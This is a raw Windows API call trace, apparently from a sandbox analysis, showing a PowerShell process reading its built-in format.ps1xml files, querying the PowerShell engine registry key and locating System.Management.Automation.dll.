	[0062.598] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.598] GetLastError () returned 0x0
	[0062.600] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.600] GetLastError () returned 0x0
	[0062.600] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.600] GetLastError () returned 0x0
	[0062.600] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x119, lpOverlapped=0x0) returned 1
	[0062.600] GetLastError () returned 0x0
	[0062.600] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.600] GetLastError () returned 0x0
	[0062.600] CloseHandle (hObject=0x2fc) returned 1
	[0062.600] GetLastError () returned 0x0
	[0062.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0062.600] GetLastError () returned 0x0
	[0062.601] SetErrorMode (uMode=0x1) returned 0x1
	[0062.601] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2447be8 | out: lpFileInformation=0x2447be8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0062.601] GetLastError () returned 0x0
	[0062.601] SetErrorMode (uMode=0x1) returned 0x1
	[0062.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0062.601] GetLastError () returned 0x0
	[0062.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.601] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.601] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.602] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0062.602] GetLastError () returned 0x0
	[0062.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0062.602] GetLastError () returned 0x0
	[0062.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.605] GetLastError () returned 0x0
	[0062.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.605] GetLastError () returned 0x0
	[0062.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0062.605] GetLastError () returned 0x0
	[0062.605] VirtualQuery (in: lpAddress=0xad3c0, lpBuffer=0xae3c0, dwLength=0x1c | out: lpBuffer=0xae3c0*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.605] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x14eec027, Data2=0xc765, Data3=0x4a7f, Data4=([0]=0x90, [1]=0xf2, [2]=0xb1, [3]=0x80, [4]=0xb5, [5]=0xf, [6]=0xf7, [7]=0x2))) returned 0x0
	[0062.606] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.606] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xff8928e4, Data2=0xc84b, Data3=0x4ef0, Data4=([0]=0xb7, [1]=0x11, [2]=0x59, [3]=0xd6, [4]=0x81, [5]=0x7, [6]=0x9c, [7]=0xa8))) returned 0x0
	[0062.606] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x17b8e5ef, Data2=0xf8a1, Data3=0x4478, Data4=([0]=0x80, [1]=0xb2, [2]=0x8e, [3]=0x95, [4]=0xc, [5]=0xa, [6]=0x1f, [7]=0xd7))) returned 0x0
	[0062.606] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x5d8b8f79, Data2=0x79c4, Data3=0x4d27, Data4=([0]=0xb5, [1]=0x2c, [2]=0x6d, [3]=0xbd, [4]=0x5c, [5]=0x20, [6]=0xb8, [7]=0xb4))) returned 0x0
	[0062.607] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.607] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae17c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0062.607] GetLastError () returned 0x0
	[0062.607] SetErrorMode (uMode=0x1) returned 0x1
	[0062.607] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.608] GetLastError () returned 0x0
	[0062.608] GetFileType (hFile=0x2fc) returned 0x1
	[0062.608] SetErrorMode (uMode=0x1) returned 0x1
	[0062.608] GetFileType (hFile=0x2fc) returned 0x1
	[0062.608] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.609] GetLastError () returned 0x0
	[0062.610] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.610] GetLastError () returned 0x0
	[0062.610] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.611] GetLastError () returned 0x0
	[0062.611] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.611] GetLastError () returned 0x0
	[0062.612] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.612] GetLastError () returned 0x0
	[0062.612] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.612] GetLastError () returned 0x0
	[0062.612] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.612] GetLastError () returned 0x0
	[0062.612] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.612] GetLastError () returned 0x0
	[0062.614] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.614] GetLastError () returned 0x0
	[0062.614] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.614] GetLastError () returned 0x0
	[0062.614] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.614] GetLastError () returned 0x0
	[0062.614] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.614] GetLastError () returned 0x0
	[0062.615] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.615] GetLastError () returned 0x0
	[0062.615] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.615] GetLastError () returned 0x0
	[0062.615] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.615] GetLastError () returned 0x0
	[0062.615] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.615] GetLastError () returned 0x0
	[0062.618] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.618] GetLastError () returned 0x0
	[0062.618] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.618] GetLastError () returned 0x0
	[0062.618] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.618] GetLastError () returned 0x0
	[0062.618] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.618] GetLastError () returned 0x0
	[0062.618] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.618] GetLastError () returned 0x0
	[0062.619] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.619] GetLastError () returned 0x0
	[0062.619] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.619] GetLastError () returned 0x0
	[0062.619] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.619] GetLastError () returned 0x0
	[0062.619] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.620] GetLastError () returned 0x0
	[0062.620] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.620] GetLastError () returned 0x0
	[0062.620] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.620] GetLastError () returned 0x0
	[0062.620] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.620] GetLastError () returned 0x0
	[0062.620] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.620] GetLastError () returned 0x0
	[0062.620] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.621] GetLastError () returned 0x0
	[0062.621] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.621] GetLastError () returned 0x0
	[0062.621] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.621] GetLastError () returned 0x0
	[0062.625] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.626] GetLastError () returned 0x0
	[0062.626] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.626] GetLastError () returned 0x0
	[0062.626] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.626] GetLastError () returned 0x0
	[0062.626] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.626] GetLastError () returned 0x0
	[0062.627] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.627] GetLastError () returned 0x0
	[0062.627] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.627] GetLastError () returned 0x0
	[0062.627] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.627] GetLastError () returned 0x0
	[0062.627] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.627] GetLastError () returned 0x0
	[0062.628] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.628] GetLastError () returned 0x0
	[0062.628] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.628] GetLastError () returned 0x0
	[0062.628] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.628] GetLastError () returned 0x0
	[0062.628] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.628] GetLastError () returned 0x0
	[0062.629] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.629] GetLastError () returned 0x0
	[0062.629] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.629] GetLastError () returned 0x0
	[0062.629] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.629] GetLastError () returned 0x0
	[0062.629] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.629] GetLastError () returned 0x0
	[0062.629] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.630] GetLastError () returned 0x0
	[0062.630] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.630] GetLastError () returned 0x0
	[0062.630] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.630] GetLastError () returned 0x0
	[0062.630] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.630] GetLastError () returned 0x0
	[0062.630] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.630] GetLastError () returned 0x0
	[0062.631] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.631] GetLastError () returned 0x0
	[0062.631] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.631] GetLastError () returned 0x0
	[0062.631] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.631] GetLastError () returned 0x0
	[0062.631] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.631] GetLastError () returned 0x0
	[0062.631] ReadFile (in: hFile=0x2fc, lpBuffer=0x2470c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2470c10*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.631] GetLastError () returned 0x0
